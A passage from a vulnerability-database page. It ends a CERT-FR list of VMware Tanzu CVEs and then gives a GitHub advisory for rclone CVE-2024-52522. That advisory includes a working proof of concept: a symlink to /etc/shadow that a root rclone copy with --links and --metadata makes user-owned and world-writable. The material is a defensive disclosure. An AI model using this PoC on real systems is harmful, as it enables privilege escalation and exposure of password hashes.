    },
    {
      "name": "CVE-2018-14033",
      "url": "https://www.cve.org/CVERecord?id=CVE-2018-14033"
    },
    {
      "name": "CVE-2018-14034",
      "url": "https://www.cve.org/CVERecord?id=CVE-2018-14034"
    },
    {
      "name": "CVE-2018-14035",
      "url": "https://www.cve.org/CVERecord?id=CVE-2018-14035"
    },
    {
      "name": "CVE-2018-14460",
      "url": "https://www.cve.org/CVERecord?id=CVE-2018-14460"
    },
    {
      "name": "CVE-2018-15671",
      "url": "https://www.cve.org/CVERecord?id=CVE-2018-15671"
    },
    {
      "name": "CVE-2018-16438",
      "url": "https://www.cve.org/CVERecord?id=CVE-2018-16438"
    },
    {
      "name": "CVE-2018-17432",
      "url": "https://www.cve.org/CVERecord?id=CVE-2018-17432"
    },
    {
      "name": "CVE-2018-17433",
      "url": "https://www.cve.org/CVERecord?id=CVE-2018-17433"
    },
    {
      "name": "CVE-2018-17434",
      "url": "https://www.cve.org/CVERecord?id=CVE-2018-17434"
    },
    {
      "name": "CVE-2018-17435",
      "url": "https://www.cve.org/CVERecord?id=CVE-2018-17435"
    },
    {
      "name": "CVE-2018-17436",
      "url": "https://www.cve.org/CVERecord?id=CVE-2018-17436"
    },
    {
      "name": "CVE-2018-17437",
      "url": "https://www.cve.org/CVERecord?id=CVE-2018-17437"
    },
    {
      "name": "CVE-2018-17438",
      "url": "https://www.cve.org/CVERecord?id=CVE-2018-17438"
    },
    {
      "name": "CVE-2018-17439",
      "url": "https://www.cve.org/CVERecord?id=CVE-2018-17439"
    },
    {
      "name": "CVE-2019-20005",
      "url": "https://www.cve.org/CVERecord?id=CVE-2019-20005"
    },
    {
      "name": "CVE-2019-20006",
      "url": "https://www.cve.org/CVERecord?id=CVE-2019-20006"
    },
    {
      "name": "CVE-2019-20007",
      "url": "https://www.cve.org/CVERecord?id=CVE-2019-20007"
    },
    {
      "name": "CVE-2019-20198",
      "url": "https://www.cve.org/CVERecord?id=CVE-2019-20198"
    },
    {
      "name": "CVE-2019-20199",
      "url": "https://www.cve.org/CVERecord?id=CVE-2019-20199"
    },
    {
      "name": "CVE-2019-20200",
      "url": "https://www.cve.org/CVERecord?id=CVE-2019-20200"
    },
    {
      "name": "CVE-2019-20201",
      "url": "https://www.cve.org/CVERecord?id=CVE-2019-20201"
    },
    {
      "name": "CVE-2019-20202",
      "url": "https://www.cve.org/CVERecord?id=CVE-2019-20202"
    },
    {
      "name": "CVE-2019-6988",
      "url": "https://www.cve.org/CVERecord?id=CVE-2019-6988"
    },
    {
      "name": "CVE-2019-8396",
      "url": "https://www.cve.org/CVERecord?id=CVE-2019-8396"
    },
    {
      "name": "CVE-2019-8397",
      "url": "https://www.cve.org/CVERecord?id=CVE-2019-8397"
    },
    {
      "name": "CVE-2019-8398",
      "url": "https://www.cve.org/CVERecord?id=CVE-2019-8398"
    },
    {
      "name": "CVE-2019-9151",
      "url": "https://www.cve.org/CVERecord?id=CVE-2019-9151"
    },
    {
      "name": "CVE-2019-9152",
      "url": "https://www.cve.org/CVERecord?id=CVE-2019-9152"
    },
    {
      "name": "CVE-2020-10809",
      "url": "https://www.cve.org/CVERecord?id=CVE-2020-10809"
    },
    {
      "name": "CVE-2020-10810",
      "url": "https://www.cve.org/CVERecord?id=CVE-2020-10810"
    },
    {
      "name": "CVE-2020-10811",
      "url": "https://www.cve.org/CVERecord?id=CVE-2020-10811"
    },
    {
      "name": "CVE-2020-10812",
      "url": "https://www.cve.org/CVERecord?id=CVE-2020-10812"
    },
    {
      "name": "CVE-2020-18232",
      "url": "https://www.cve.org/CVERecord?id=CVE-2020-18232"
    },
    {
      "name": "CVE-2020-18494",
      "url": "https://www.cve.org/CVERecord?id=CVE-2020-18494"
    },
    {
      "name": "CVE-2021-26220",
      "url": "https://www.cve.org/CVERecord?id=CVE-2021-26220"
    },
    {
      "name": "CVE-2021-26221",
      "url": "https://www.cve.org/CVERecord?id=CVE-2021-26221"
    },
    {
      "name": "CVE-2021-26222",
      "url": "https://www.cve.org/CVERecord?id=CVE-2021-26222"
    },
    {
      "name": "CVE-2021-30485",
      "url": "https://www.cve.org/CVERecord?id=CVE-2021-30485"
    },
    {
      "name": "CVE-2021-31229",
      "url": "https://www.cve.org/CVERecord?id=CVE-2021-31229"
    },
    {
      "name": "CVE-2021-31347",
      "url": "https://www.cve.org/CVERecord?id=CVE-2021-31347"
    },
    {
      "name": "CVE-2021-31348",
      "url": "https://www.cve.org/CVERecord?id=CVE-2021-31348"
    },
    {
      "name": "CVE-2021-31598",
      "url": "https://www.cve.org/CVERecord?id=CVE-2021-31598"
    },
    {
      "name": "CVE-2021-33430",
      "url": "https://www.cve.org/CVERecord?id=CVE-2021-33430"
    },
    {
      "name": "CVE-2021-37501",
      "url": "https://www.cve.org/CVERecord?id=CVE-2021-37501"
    },
    {
      "name": "CVE-2021-45829",
      "url": "https://www.cve.org/CVERecord?id=CVE-2021-45829"
    },
    {
      "name": "CVE-2021-45830",
      "url": "https://www.cve.org/CVERecord?id=CVE-2021-45830"
    },
    {
      "name": "CVE-2021-45832",
      "url": "https://www.cve.org/CVERecord?id=CVE-2021-45832"
    },
    {
      "name": "CVE-2021-45833",
      "url": "https://www.cve.org/CVERecord?id=CVE-2021-45833"
    },
    {
      "name": "CVE-2021-46242",
      "url": "https://www.cve.org/CVERecord?id=CVE-2021-46242"
    },
    {
      "name": "CVE-2021-46243",
      "url": "https://www.cve.org/CVERecord?id=CVE-2021-46243"
    },
    {
      "name": "CVE-2021-46244",
      "url": "https://www.cve.org/CVERecord?id=CVE-2021-46244"
    },
    {
      "name": "CVE-2022-25942",
      "url": "https://www.cve.org/CVERecord?id=CVE-2022-25942"
    },
    {
      "name": "CVE-2022-25972",
      "url": "https://www.cve.org/CVERecord?id=CVE-2022-25972"
    },
    {
      "name": "CVE-2022-26061",
      "url": "https://www.cve.org/CVERecord?id=CVE-2022-26061"
    },
    {
      "name": "CVE-2022-30045",
      "url": "https://www.cve.org/CVERecord?id=CVE-2022-30045"
    },
    {
      "name": "CVE-2022-4055",
      "url": "https://www.cve.org/CVERecord?id=CVE-2022-4055"
    },
    {
      "name": "CVE-2022-47655",
      "url": "https://www.cve.org/CVERecord?id=CVE-2022-47655"
    },
    {
      "name": "CVE-2023-0996",
      "url": "https://www.cve.org/CVERecord?id=CVE-2023-0996"
    },
    {
      "name": "CVE-2023-29659",
      "url": "https://www.cve.org/CVERecord?id=CVE-2023-29659"
    },
    {
      "name": "CVE-2023-32570",
      "url": "https://www.cve.org/CVERecord?id=CVE-2023-32570"
    },
    {
      "name": "CVE-2023-39328",
      "url": "https://www.cve.org/CVERecord?id=CVE-2023-39328"
    },
    {
      "name": "CVE-2023-39329",
      "url": "https://www.cve.org/CVERecord?id=CVE-2023-39329"
    },
    {
      "name": "CVE-2023-51792",
      "url": "https://www.cve.org/CVERecord?id=CVE-2023-51792"
    },
    {
      "name": "CVE-2023-6879",
      "url": "https://www.cve.org/CVERecord?id=CVE-2023-6879"
    },
    {
      "name": "CVE-2024-27304",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-27304"
    },
    {
      "name": "CVE-2024-29157",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-29157"
    },
    {
      "name": "CVE-2024-29158",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-29158"
    },
    {
      "name": "CVE-2024-29159",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-29159"
    },
    {
      "name": "CVE-2024-29160",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-29160"
    },
    {
      "name": "CVE-2024-29161",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-29161"
    },
    {
      "name": "CVE-2024-29162",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-29162"
    },
    {
      "name": "CVE-2024-29163",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-29163"
    },
    {
      "name": "CVE-2024-29164",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-29164"
    },
    {
      "name": "CVE-2024-29165",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-29165"
    },
    {
      "name": "CVE-2024-29166",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-29166"
    },
    {
      "name": "CVE-2024-32605",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-32605"
    },
    {
      "name": "CVE-2024-32606",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-32606"
    },
    {
      "name": "CVE-2024-32607",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-32607"
    },
    {
      "name": "CVE-2024-32608",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-32608"
    },
    {
      "name": "CVE-2024-32609",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-32609"
    },
    {
      "name": "CVE-2024-32610",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-32610"
    },
    {
      "name": "CVE-2024-32611",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-32611"
    },
    {
      "name": "CVE-2024-32612",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-32612"
    },
    {
      "name": "CVE-2024-32613",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-32613"
    },
    {
      "name": "CVE-2024-32614",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-32614"
    },
    {
      "name": "CVE-2024-32615",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-32615"
    },
    {
      "name": "CVE-2024-32616",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-32616"
    },
    {
      "name": "CVE-2024-32617",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-32617"
    },
    {
      "name": "CVE-2024-32618",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-32618"
    },
    {
      "name": "CVE-2024-32619",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-32619"
    },
    {
      "name": "CVE-2024-32620",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-32620"
    },
    {
      "name": "CVE-2024-32621",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-32621"
    },
    {
      "name": "CVE-2024-32622",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-32622"
    },
    {
      "name": "CVE-2024-32623",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-32623"
    },
    {
      "name": "CVE-2024-32624",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-32624"
    },
    {
      "name": "CVE-2024-33873",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-33873"
    },
    {
      "name": "CVE-2024-33874",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-33874"
    },
    {
      "name": "CVE-2024-33875",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-33875"
    },
    {
      "name": "CVE-2024-33876",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-33876"
    },
    {
      "name": "CVE-2024-33877",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-33877"
    },
    {
      "name": "CVE-2024-34402",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-34402"
    },
    {
      "name": "CVE-2024-34403",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-34403"
    },
    {
      "name": "CVE-2024-38949",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-38949"
    },
    {
      "name": "CVE-2024-38950",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-38950"
    },
    {
      "name": "CVE-2024-41996",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-41996"
    },
    {
      "name": "CVE-2024-45993",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-45993"
    },
    {
      "name": "CVE-2024-46981",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-46981"
    },
    {
      "name": "CVE-2024-49203",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-49203"
    },
    {
      "name": "CVE-2024-5171",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-5171"
    },
    {
      "name": "CVE-2024-51741",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-51741"
    },
    {
      "name": "CVE-2024-52522",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-52522"
    },
    {
      "name": "CVE-2024-52616",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-52616"
    },
    {
      "name": "CVE-2024-53427",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-53427"
    },
    {
      "name": "CVE-2024-53920",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-53920"
    },
    {
      "name": "CVE-2024-56378",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-56378"
    },
    {
      "name": "CVE-2024-56406",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-56406"
    },
    {
      "name": "CVE-2024-56826",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-56826"
    },
    {
      "name": "CVE-2024-56827",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-56827"
    },
    {
      "name": "CVE-2024-6716",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-6716"
    },
    {
      "name": "CVE-2025-2153",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-2153"
    },
    {
      "name": "CVE-2025-22872",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-22872"
    },
    {
      "name": "CVE-2025-23022",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-23022"
    },
    {
      "name": "CVE-2025-24528",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-24528"
    },
    {
      "name": "CVE-2025-4802",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-4802"
    }
  ],
  "initial_release_date": "2025-06-19T00:00:00",
  "last_revision_date": "2025-06-19T00:00:00",
  "links": [],
  "reference": "CERTFR-2025-AVI-0524",
  "revisions": [
    {
      "description": "Version initiale",
      "revision_date": "2025-06-19T00:00:00.000000"
    }
  ],
  "risks": [
    {
      "description": "Non sp\u00e9cifi\u00e9 par l\u0027\u00e9diteur"
    }
  ],
  "summary": "De multiples vuln\u00e9rabilit\u00e9s ont \u00e9t\u00e9 d\u00e9couvertes dans VMware Tanzu. Elles permettent \u00e0 un attaquant de provoquer un probl\u00e8me de s\u00e9curit\u00e9 non sp\u00e9cifi\u00e9 par l\u0027\u00e9diteur.",
  "title": "Multiples vuln\u00e9rabilit\u00e9s dans VMware Tanzu",
  "vendor_advisories": [
    {
      "published_at": "2025-06-18",
      "title": "Bulletin de s\u00e9curit\u00e9 VMware 35841",
      "url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/35841"
    },
    {
      "published_at": "2025-06-18",
      "title": "Bulletin de s\u00e9curit\u00e9 VMware 35844",
      "url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/35844"
    },
    {
      "published_at": "2025-06-18",
      "title": "Bulletin de s\u00e9curit\u00e9 VMware 35843",
      "url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/35843"
    },
    {
      "published_at": "2025-06-18",
      "title": "Bulletin de s\u00e9curit\u00e9 VMware 35842",
      "url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/35842"
    },
    {
      "published_at": "2025-06-18",
      "title": "Bulletin de s\u00e9curit\u00e9 VMware 35846",
      "url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/35846"
    },
    {
      "published_at": "2025-06-18",
      "title": "Bulletin de s\u00e9curit\u00e9 VMware 35849",
      "url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/35849"
    },
    {
      "published_at": "2025-06-18",
      "title": "Bulletin de s\u00e9curit\u00e9 VMware 35840",
      "url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/35840"
    },
    {
      "published_at": "2025-06-18",
      "title": "Bulletin de s\u00e9curit\u00e9 VMware 35847",
      "url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/35847"
    },
    {
      "published_at": "2025-06-18",
      "title": "Bulletin de s\u00e9curit\u00e9 VMware 35839",
      "url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/35839"
    },
    {
      "published_at": "2025-06-18",
      "title": "Bulletin de s\u00e9curit\u00e9 VMware 35845",
      "url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/35845"
    },
    {
      "published_at": "2025-06-18",
      "title": "Bulletin de s\u00e9curit\u00e9 VMware 35848",
      "url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/35848"
    }
  ]
}

GHSA-HRXH-9W67-G4CV

Vulnerability from github – Published: 2024-11-19 20:36 – Updated: 2024-11-19 20:36

Summary

Rclone has Improper Permission and Ownership Handling on Symlink Targets with --links and --metadata

Details

tl;dr:

unprivileged user creates a symlink to /etc/sudoers, /etc/shadow or similar and waits for a privileged user or process to copy/backup/mirror users data (using --links and --metadata). unprivileged user now owns /etc/sudoers.

Summary

Insecure handling of symlinks with --links and --metadata in rclone while copying to local disk allows unprivileged users to indirectly modify ownership and permissions on symlink target files when a superuser or privileged process performs a copy. This vulnerability could enable privilege escalation and unauthorized access to critical system files (e.g., /etc/shadow), compromising system integrity, confidentiality, and availability.

For instance, an unprivileged user could set a symlink to a sensitive file within their home directory, waiting for an administrator or automated process (e.g., a cron job running with elevated privileges) to copy their files with rclone using the --links and --metadata options. Upon copying, rclone will incorrectly apply chown and chmod to the symlink’s target file rather than just the symlink itself, resulting in ownership and permission changes on the sensitive file.

Who is affected

If you are not using --metadata and --links and copying files to the local backend you are not affected by this issue.

If you are using --metadata and -links and copying files to the local backend but not as a superuser, then this will manifest itself as a bug by setting incorrect permissions.

If you are using --metadata and -links and copying files to the local backend but as a superuser then this could affect you.

Details

When copying directories containing symlinks with rclone using the --links and --metadata options, rclone mistakenly applies chown and chmod operations to the target of the symlink instead of the symlink itself. As a result, ownership and permissions on sensitive system files (e.g., /etc/shadow) may be altered if they are the target of any symlink within the copied directory structure. This allows users to affect the permissions and ownership of files they should not have access to, resulting in privilege escalation and potential system compromise.

PoC

# Create a directory to simulate a user home directory
root@workstation:~# mkdir -p /tmp/home/user1
root@workstation:~# sudo chown user1:user1 /tmp/home/user1

# As user1, create a symlink to /etc/shadow within their home directory
root@workstation:~# sudo -u user1 ln -s /etc/shadow /tmp/home/user1/shadow_link

# List permissions on the original files
root@workstation:~# ls -l /tmp/home/user1/shadow_link /etc/shadow
----------. 1 root  root  1283 Nov  5 13:30 /etc/shadow
lrwxrwxrwx. 1 user1 user1   11 Nov  5 13:56 /tmp/home/user1/shadow_link -> /etc/shadow

# Copy the directory structure with rclone
root@workstation:~# rclone copy /tmp/home /tmp/home_new --links --metadata --log-level=DEBUG
2024/11/05 13:56:53 DEBUG : rclone: Version "v1.68.1" starting with parameters ["rclone" "copy" "/tmp/home" "/tmp/home_new" "--links" "--metadata" "--log-level=DEBUG"]
2024/11/05 13:56:53 DEBUG : Creating backend with remote "/tmp/home"
2024/11/05 13:56:53 NOTICE: Config file "/root/.config/rclone/rclone.conf" not found - using defaults
2024/11/05 13:56:53 DEBUG : local: detected overridden config - adding "{b6816}" suffix to name
2024/11/05 13:56:53 DEBUG : fs cache: renaming cache item "/tmp/home" to be canonical "local{b6816}:/tmp/home"
2024/11/05 13:56:53 DEBUG : Creating backend with remote "/tmp/home_new"
2024/11/05 13:56:53 DEBUG : local: detected overridden config - adding "{b6816}" suffix to name
2024/11/05 13:56:53 DEBUG : fs cache: renaming cache item "/tmp/home_new" to be canonical "local{b6816}:/tmp/home_new"
2024/11/05 13:56:53 DEBUG : Added delayed dir = "user1", newDst=<nil>
2024/11/05 13:56:53 DEBUG : user1/shadow_link.rclonelink: Need to transfer - File not found at Destination
2024/11/05 13:56:53 DEBUG : user1/shadow_link.rclonelink: md5 = 2fe8599cb25a0c790213d39b3be97c27 OK
2024/11/05 13:56:53 INFO  : user1/shadow_link.rclonelink: Copied (new)
2024/11/05 13:56:53 DEBUG : Local file system at /tmp/home_new: Waiting for checks to finish
2024/11/05 13:56:53 DEBUG : Local file system at /tmp/home_new: Waiting for transfers to finish
2024/11/05 13:56:53 INFO  : user1: Updated directory metadata
2024/11/05 13:56:53 INFO  :
Transferred:             11 B / 11 B, 100%, 0 B/s, ETA -
Transferred:            1 / 1, 100%
Elapsed time:         0.0s

2024/11/05 13:56:53 DEBUG : 6 go routines active

# List permissions again
root@workstation:~# ls -l /tmp/home/user1/shadow_link /etc/shadow /tmp/home_new/user1/shadow_link
-rwxrwxrwx. 1 user1 user1 1283 Nov  5 13:30 /etc/shadow                                                 # Wrong, very wrong. Should be root:root and 0000.
lrwxrwxrwx. 1 root  root    11 Nov  5 13:56 /tmp/home_new/user1/shadow_link -> /etc/shadow              # Wrong too, should be user1:user1
lrwxrwxrwx. 1 user1 user1   11 Nov  5 13:56 /tmp/home/user1/shadow_link -> /etc/shadow

# Fix /etc/shadow and clean up
root@workstation:~# chown root:root /etc/shadow
root@workstation:~# chmod 000 /etc/shadow
root@workstation:~# rm -rf /tmp/home /tmp/home_new

Impact

Type of Vulnerability: Improper permissions and ownership handling on symlink targets (Insecure Handling of Symlinks)

Impact: This vulnerability allows unprivileged users to modify permissions and ownership of sensitive system files by creating symlinks to those files in directories that are subsequently copied by an administrator with rclone --links --metadata. This can lead to unauthorized access, privilege escalation, and potential system compromise.

Severity ?

5.5 (Medium)


                  
                    CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:L

5.4 (Medium)


                  
                    CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:A/VC:H/VI:H/VA:H/SC:L/SI:L/SA:L

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/rclone/rclone"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "1.59.0"
            },
            {
              "fixed": "1.68.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2024-52522"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-281"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2024-11-19T20:36:02Z",
    "nvd_published_at": "2024-11-15T18:15:30Z",
    "severity": "MODERATE"
  },
  "details": "### **tl;dr:**\n\nunprivileged user creates a symlink to /etc/sudoers, /etc/shadow or similar and waits for a privileged user or process to copy/backup/mirror users data (using `--links` and `--metadata`). unprivileged user now owns /etc/sudoers.\n\n### Summary\n\nInsecure handling of symlinks with `--links` and `--metadata` in rclone while copying to local disk allows unprivileged users to indirectly modify ownership and permissions on symlink target files when a superuser or privileged process performs a copy. This vulnerability could enable privilege escalation and unauthorized access to critical system files (e.g., /etc/shadow), compromising system integrity, confidentiality, and availability.\n\nFor instance, an unprivileged user could set a symlink to a sensitive file within their home directory, waiting for an administrator or automated process (e.g., a cron job running with elevated privileges) to copy their files with rclone using the --links and --metadata options. Upon copying, rclone will incorrectly apply chown and chmod to the symlink\u2019s target file rather than just the symlink itself, resulting in ownership and permission changes on the sensitive file.\n\n### Who is affected\n\nIf you are not using `--metadata` **and** `--links` **and** copying files **to** the local backend you are not affected by this issue.\n\nIf you are using `--metadata` and `-links` and copying files to the local backend but not as a superuser, then this will manifest itself as a bug by setting incorrect permissions.\n\nIf you are using `--metadata` and `-links` and copying files to the local backend but as a superuser then this could affect you.\n\n### Details\n\nWhen copying directories containing symlinks with rclone using the --links and --metadata options, rclone mistakenly applies chown and chmod operations to the target of the symlink instead of the symlink itself. As a result, ownership and permissions on sensitive system files (e.g., /etc/shadow) may be altered if they are the target of any symlink within the copied directory structure. This allows users to affect the permissions and ownership of files they should not have access to, resulting in privilege escalation and potential system compromise.\n\n### PoC\n\n```\n# Create a directory to simulate a user home directory\nroot@workstation:~# mkdir -p /tmp/home/user1\nroot@workstation:~# sudo chown user1:user1 /tmp/home/user1\n```\n```\n# As user1, create a symlink to /etc/shadow within their home directory\nroot@workstation:~# sudo -u user1 ln -s /etc/shadow /tmp/home/user1/shadow_link\n```\n```\n# List permissions on the original files\nroot@workstation:~# ls -l /tmp/home/user1/shadow_link /etc/shadow\n----------. 1 root  root  1283 Nov  5 13:30 /etc/shadow\nlrwxrwxrwx. 1 user1 user1   11 Nov  5 13:56 /tmp/home/user1/shadow_link -\u003e /etc/shadow\n```\n```\n# Copy the directory structure with rclone\nroot@workstation:~# rclone copy /tmp/home /tmp/home_new --links --metadata --log-level=DEBUG\n2024/11/05 13:56:53 DEBUG : rclone: Version \"v1.68.1\" starting with parameters [\"rclone\" \"copy\" \"/tmp/home\" \"/tmp/home_new\" \"--links\" \"--metadata\" \"--log-level=DEBUG\"]\n2024/11/05 13:56:53 DEBUG : Creating backend with remote \"/tmp/home\"\n2024/11/05 13:56:53 NOTICE: Config file \"/root/.config/rclone/rclone.conf\" not found - using defaults\n2024/11/05 13:56:53 DEBUG : local: detected overridden config - adding \"{b6816}\" suffix to name\n2024/11/05 13:56:53 DEBUG : fs cache: renaming cache item \"/tmp/home\" to be canonical \"local{b6816}:/tmp/home\"\n2024/11/05 13:56:53 DEBUG : Creating backend with remote \"/tmp/home_new\"\n2024/11/05 13:56:53 DEBUG : local: detected overridden config - adding \"{b6816}\" suffix to name\n2024/11/05 13:56:53 DEBUG : fs cache: renaming cache item \"/tmp/home_new\" to be canonical \"local{b6816}:/tmp/home_new\"\n2024/11/05 13:56:53 DEBUG : Added delayed dir = \"user1\", newDst=\u003cnil\u003e\n2024/11/05 13:56:53 DEBUG : user1/shadow_link.rclonelink: Need to transfer - File not found at Destination\n2024/11/05 13:56:53 DEBUG : user1/shadow_link.rclonelink: md5 = 2fe8599cb25a0c790213d39b3be97c27 OK\n2024/11/05 13:56:53 INFO  : user1/shadow_link.rclonelink: Copied (new)\n2024/11/05 13:56:53 DEBUG : Local file system at /tmp/home_new: Waiting for checks to finish\n2024/11/05 13:56:53 DEBUG : Local file system at /tmp/home_new: Waiting for transfers to finish\n2024/11/05 13:56:53 INFO  : user1: Updated directory metadata\n2024/11/05 13:56:53 INFO  :\nTransferred:             11 B / 11 B, 100%, 0 B/s, ETA -\nTransferred:            1 / 1, 100%\nElapsed time:         0.0s\n\n2024/11/05 13:56:53 DEBUG : 6 go routines active\n```\n```\n# List permissions again\nroot@workstation:~# ls -l /tmp/home/user1/shadow_link /etc/shadow /tmp/home_new/user1/shadow_link\n-rwxrwxrwx. 1 user1 user1 1283 Nov  5 13:30 /etc/shadow                                                 # Wrong, very wrong. Should be root:root and 0000.\nlrwxrwxrwx. 1 root  root    11 Nov  5 13:56 /tmp/home_new/user1/shadow_link -\u003e /etc/shadow              # Wrong too, should be user1:user1\nlrwxrwxrwx. 1 user1 user1   11 Nov  5 13:56 /tmp/home/user1/shadow_link -\u003e /etc/shadow\n```\n```\n# Fix /etc/shadow and clean up\nroot@workstation:~# chown root:root /etc/shadow\nroot@workstation:~# chmod 000 /etc/shadow\nroot@workstation:~# rm -rf /tmp/home /tmp/home_new\n```\n### Impact\nType of Vulnerability: Improper permissions and ownership handling on symlink targets (Insecure Handling of Symlinks)\n\nImpact: This vulnerability allows unprivileged users to modify permissions and ownership of sensitive system files by creating symlinks to those files in directories that are subsequently copied by an administrator with rclone --links --metadata. This can lead to unauthorized access, privilege escalation, and potential system compromise.",
  "id": "GHSA-hrxh-9w67-g4cv",
  "modified": "2024-11-19T20:36:02Z",
  "published": "2024-11-19T20:36:02Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/rclone/rclone/security/advisories/GHSA-hrxh-9w67-g4cv"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-52522"
    },
    {
      "type": "WEB",
      "url": "https://github.com/rclone/rclone/commit/01ccf204f42b4f68541b16843292439090a2dcf0"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/rclone/rclone"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:L",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:A/VC:H/VI:H/VA:H/SC:L/SI:L/SA:L",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Rclone has Improper Permission and Ownership Handling on Symlink Targets with --links and --metadata"
}

bit-rclone-2024-52522

Vulnerability from bitnami_vulndb

Published

2025-04-14 11:22

Modified

2025-05-20 10:02

Summary

Rclone Improper Permission and Ownership Handling on Symlink Targets with --links and --metadata

Details

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "Bitnami",
        "name": "rclone",
        "purl": "pkg:bitnami/rclone"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "1.59.0"
            },
            {
              "fixed": "1.68.2"
            }
          ],
          "type": "SEMVER"
        }
      ],
      "severity": [
        {
          "score": "CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:A/VC:H/VI:H/VA:H/SC:L/SI:L/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
          "type": "CVSS_V4"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2024-52522"
  ],
  "database_specific": {
    "cpes": [
      "cpe:2.3:a:rclone:rclone:*:*:*:*:*:go:*:*"
    ],
    "severity": "Medium"
  },
